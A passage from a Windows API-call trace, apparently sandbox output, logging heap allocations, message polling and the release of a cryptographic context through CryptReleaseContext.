Flags=0x0, Size=0x18) returned 0x2e69928 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0187.992] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0187.992] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.992] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0187.992] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.992] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0187.993] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0187.994] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0187.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0187.995] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0187.995] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0187.995] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0187.995] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.995] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0187.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0187.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0187.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0187.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0187.996] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.996] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.996] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.997] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.997] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.997] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.997] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.997] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.998] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.998] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0187.998] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0187.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69be8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0187.999] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.999] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0188.000] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0188.000] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0188.000] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0188.001] RtlAllocateHeap 